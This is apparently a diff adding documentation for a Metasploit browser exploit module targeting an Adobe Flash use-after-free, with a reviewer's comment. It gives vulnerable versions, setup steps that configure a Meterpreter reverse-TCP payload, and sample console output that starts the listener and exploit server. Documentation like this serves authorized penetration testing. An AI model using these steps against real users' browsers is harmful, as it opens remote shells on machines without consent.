documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md

```diff
@@ -0,0 +1,73 @@
+4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194.
+5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
+
+## Adobe Flash Player
+
+Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf```
+2. Do: ```set payload windows/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Sample Output
+
+```
+msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf
+msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160
+lhost => 172.16.178.160
+msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160
+srvhost => 172.16.178.160
+msf exploit(adobe_flash_hacking_team_uaf) > set uripath /
+uripath => /
+msf exploit(adobe_flash_hacking_team_uaf) > show options
+
+Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Retries  true             no        Allow the browser to retry the module
+   SRVHOST  172.16.178.160   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH  /                no        The URI to use for this exploit (default is random)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.178.160   yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf exploit(adobe_flash_hacking_team_uaf) > exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.178.160:4444 
+[*] Using URL: http://172.16.178.160:8080/
+[*] Server started.
+msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.160   adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.160
+[*] 172.16.178.160   adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.160
```

Comment:
did you not get a shell like you were supposed to?  What OS/browser was used in this example?